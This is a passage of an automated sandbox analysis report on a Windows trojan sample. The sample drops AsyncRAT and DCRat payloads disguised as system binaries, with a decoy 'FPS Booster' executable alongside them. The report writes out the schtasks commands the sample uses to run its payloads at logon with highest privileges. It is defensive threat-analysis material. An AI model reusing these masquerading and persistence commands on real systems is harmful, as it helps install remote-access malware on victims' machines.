                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: UNFOT5F1qt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@22/28@0/1
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044D1
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004024FB CoCreateInstance,7_2_004024FB
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_0040135A GetSystemDirectoryA,PathAddBackslashA,GetWindowsDirectoryA,GetTempPathA,GetModuleFileNameA,GetEnvironmentVariableA,FindResourceA,SizeofResource,LoadResource,LockResource,GlobalAlloc,RtlMoveMemory,GlobalAlloc,RtlMoveMemory,GlobalFree,lstrcpynA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,lstrcatA,lstrcpyA,CreateFileA,WriteFile,HeapAlloc,WriteFile,HeapFree,CreateFileA,GetFileSize,CloseHandle,HeapAlloc,WriteFile,HeapFree,CloseHandle,GlobalFree,SetFileAttributesA,lstrcpyA,PathFindFileNameA,ShellExecuteA,FreeResource,ExitProcess,ExitProcess,2_2_0040135A
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to behavior
                    Source: C:\Windows\regedit\explorer.exeMutant created: NULL
                    Source: C:\Windows\regedit\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\aa121e4af995dea523d8190342698ff18efb3e55
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2000
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeFile created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeJump to behavior
                    Source: unknownProcess created: C:\Windows\regedit\explorer.exe
                    Source: unknownProcess created: C:\Windows\regedit\explorer.exe
                    Source: UNFOT5F1qt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UNFOT5F1qt.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: UNFOT5F1qt.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeFile read: C:\Users\user\Desktop\UNFOT5F1qt.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe"
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe"
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
                    Source: unknownProcess created: C:\Windows\regedit\explorer.exe C:\Windows\regedit\explorer.exe
                    Source: unknownProcess created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                    Source: unknownProcess created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                    Source: unknownProcess created: C:\Windows\regedit\explorer.exe "C:\Windows\regedit\explorer.exe"
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\regedit\explorer.exeSection loaded: mscoree.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: apphelp.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: version.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: wldp.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: profapi.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: apphelp.dll
